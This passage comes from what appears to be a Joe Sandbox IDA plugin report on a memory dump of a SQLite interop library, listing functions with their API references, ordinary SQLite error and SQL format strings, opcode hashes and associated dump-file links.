                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__localtime64_s
                                                                                                                                                                                                                                      • String ID: local time unavailable
                                                                                                                                                                                                                                      • API String ID: 88041608-3313036412
                                                                                                                                                                                                                                      • Opcode ID: 7d60ef94cd936b47be769122f6e39df0083cb7c3e67ee2bc4e066642074ff6e6
                                                                                                                                                                                                                                      • Instruction ID: 125e3096c988587ee88483c8d304d324759b254b5dc2947e510f44227865dacd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d60ef94cd936b47be769122f6e39df0083cb7c3e67ee2bc4e066642074ff6e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B518B716187418FD714CF68C881A1FFBE5FB88354F504A2EF59987290EB78EA04CB92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC52A24
                                                                                                                                                                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6BC52904
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52A15
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC52A1F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                      • API String ID: 0-1278717071
                                                                                                                                                                                                                                      • Opcode ID: 5800c1b3c8dbdf0e0e6555dae307ee3731c1ad4bf5b74d1413d12eb6ab721c42
                                                                                                                                                                                                                                      • Instruction ID: 614e255c38960f2a409dc874a8c9f464a2fc5eb931cea57f291fc9b0dbb78135
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5800c1b3c8dbdf0e0e6555dae307ee3731c1ad4bf5b74d1413d12eb6ab721c42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3512B726242059BD710CF19D891B96F7E0FB44324F048199ECA88F391E739E670CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC5C7B4
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000353F9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BC6459C), ref: 6BC5C812
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5C80B
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC5C806
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5C7FC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d._memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 3064812586-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 17af645f2701c0d4d8417aef2993e03448f5f07c07889aebed609aa3660e51b0
                                                                                                                                                                                                                                      • Instruction ID: 1a5b8fc50d05ee706f1444929fdfe35c7aa55266615fd90255e2600a373d6dbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17af645f2701c0d4d8417aef2993e03448f5f07c07889aebed609aa3660e51b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41B4B2A142108FCB14CF28D88196B77A9FF84714F0445AEED499B346F735DA24CBE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC49032
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC49060
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC490BE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: JSON cannot hold BLOB values$null
                                                                                                                                                                                                                                      • API String ID: 837155543-1864232943
                                                                                                                                                                                                                                      • Opcode ID: 0a188520bd39e63d2855cd2e5b06df400231f68124670c08fb137b8b0077d7b7
                                                                                                                                                                                                                                      • Instruction ID: dcffc468be5f8c2c787beb90b58a05ea0139b14de74e2c07e6722d95b989a0f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a188520bd39e63d2855cd2e5b06df400231f68124670c08fb137b8b0077d7b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A3128B2A107104FD730CF29EC81757B3E4AB49228F0446BED96AC7642F779E7188792
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC2F10E
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%.*f,00000000), ref: 6BC2F1CD
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC2F1DF
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,?), ref: 6BC2F204
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I1bf8975e567ea97a.I5b914c29cf5a7984.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: %.*f
                                                                                                                                                                                                                                      • API String ID: 1792259931-1338106815
                                                                                                                                                                                                                                      • Opcode ID: ba3f496f721f9b9c45c655e07b27cb069daf4f29c519aa3adf12bf48d389a068
                                                                                                                                                                                                                                      • Instruction ID: 4a275992a1e39378a4c8ed7ed0b40ee1e8e578d23c10a289224afb89654fda48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba3f496f721f9b9c45c655e07b27cb069daf4f29c519aa3adf12bf48d389a068
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78318671D251185BDB016FA8E90539A77B4BF43745F4001C9EC84AA241FB3D8B55CBE2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ACAC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,6BC6D789,?,?,00000000,00000000,00000000), ref: 6BC6A3DA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6A3D3
                                                                                                                                                                                                                                      • unknown database: %s, xrefs: 6BC6A43E
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6A3C4
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC6A3CE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unknown database: %s
                                                                                                                                                                                                                                      • API String ID: 2981141233-630002017
                                                                                                                                                                                                                                      • Opcode ID: 0fdfb855e6b8e07d4dbeb6b649d5d1b3fb071468e46c611763346546e2e93d1a
                                                                                                                                                                                                                                      • Instruction ID: 8b9471963a4071365cb9841e2177658b749f46b8f03465f08c533a699cec37bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fdfb855e6b8e07d4dbeb6b649d5d1b3fb071468e46c611763346546e2e93d1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E331F771A152215BDB109F69DCC9F677758EB817A4F0401B9FD199F282F73CCA1087A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BCCB650: SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6BD06F50,?,?,?,?,?,?,?,?,?,6BCDE8E3,?,?,?), ref: 6BCCB68B
                                                                                                                                                                                                                                        • Part of subcall function 6BCCB650: SIdb45e174afb28e2c.SQLITE.INTEROP(6BD08268,?,?,?,6BCDE8E3,?,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCCB6AB
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z),?,?,?,?,6BCE21D9,00000000,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCDE901
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCDE94A
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,00000017,?), ref: 6BCDE962
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDE97F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z), xrefs: 6BCDE8FC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.$Ia364946505687432.$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z)
                                                                                                                                                                                                                                      • API String ID: 2723302667-1366569373
                                                                                                                                                                                                                                      • Opcode ID: 1d1acaee876aca2f8c1719ad35fcaf345f6c9a8a6af5dafb6a27a5b52e3b2f82
                                                                                                                                                                                                                                      • Instruction ID: 2a949f7a3c34de1ce13ba985f77a9c4f72280c3d5268ad1483d917184206facc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1acaee876aca2f8c1719ad35fcaf345f6c9a8a6af5dafb6a27a5b52e3b2f82
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 642195B5A11204ABDB10DF68DC41F6BB7B8DF84714F1441A9F9599B341F735EA00C7A2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001131D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC60B7D), ref: 6BC5A861
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001132B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC60B7D), ref: 6BC5A8EF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: f33a84e0b7273f33b8e22522795b01f00019a349f48d004817918bee16fb4058
                                                                                                                                                                                                                                      • Instruction ID: 6fd6fbfb4de18568826766a0c7d9943ef509577e511471a9c2dfbecc90953b9d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f33a84e0b7273f33b8e22522795b01f00019a349f48d004817918bee16fb4058
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D216B722147500BC324EF3AD941B93BBF0DF84321B04456EE5DACBA86E728E5248775
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000000), ref: 6BC55F88
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000070B3,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC55FDD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC55FD6
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55FC7
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC55FD1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalI769271af19a2299d.InitializeSection
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2812754129-160653349
                                                                                                                                                                                                                                      • Opcode ID: a1631da08afe0d98e40984db09fca2fa8c137afb22f1f9a8f559d40c866e96d5
                                                                                                                                                                                                                                      • Instruction ID: 67467d76653d31c9bdce7a1e044411973050f89b1c0b816333238d10fc97f06d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1631da08afe0d98e40984db09fca2fa8c137afb22f1f9a8f559d40c866e96d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8921C972A142008FEB009F6CAC06B4677E8DB45325F45427AFE1CDB251F738D635C6AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000112FD,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,00000000,00000000), ref: 6BC54711
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: ebd61515a1c7e6e030ade54356886666d3de09c32b356338e8818ec24211b9e1
                                                                                                                                                                                                                                      • Instruction ID: cd6d9c92533bc97fdd90dbd3632be2b0c7df02db0654cc9c4b7a859c4bfe51d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebd61515a1c7e6e030ade54356886666d3de09c32b356338e8818ec24211b9e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C213871E402159BC710CF59CC40AAFB3F0EF90715F104199E8859B745F7395666C7A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079BC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?), ref: 6BCC5A89
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCC5A82
                                                                                                                                                                                                                                      • F, xrefs: 6BCC5AC1
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC5A73
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCC5A7D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$F$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-3876738975
                                                                                                                                                                                                                                      • Opcode ID: d46e3b0c263b7ed6413b758753c4dc114e912d5b7499605f639390cc7db2c663
                                                                                                                                                                                                                                      • Instruction ID: 4f61b882f781d7eef05cf3f95e5f31746b23b224653ab985a7fc8a2fa34724b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d46e3b0c263b7ed6413b758753c4dc114e912d5b7499605f639390cc7db2c663
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A21A471B183445BC600DF29D88245FBBE4EF88228F40466EFA8DA7240F7389A04CBD7
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC559AF
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000FB1B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,6BC5AD52,?,?,?,?,?,?,?), ref: 6BC55A2A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC55A23
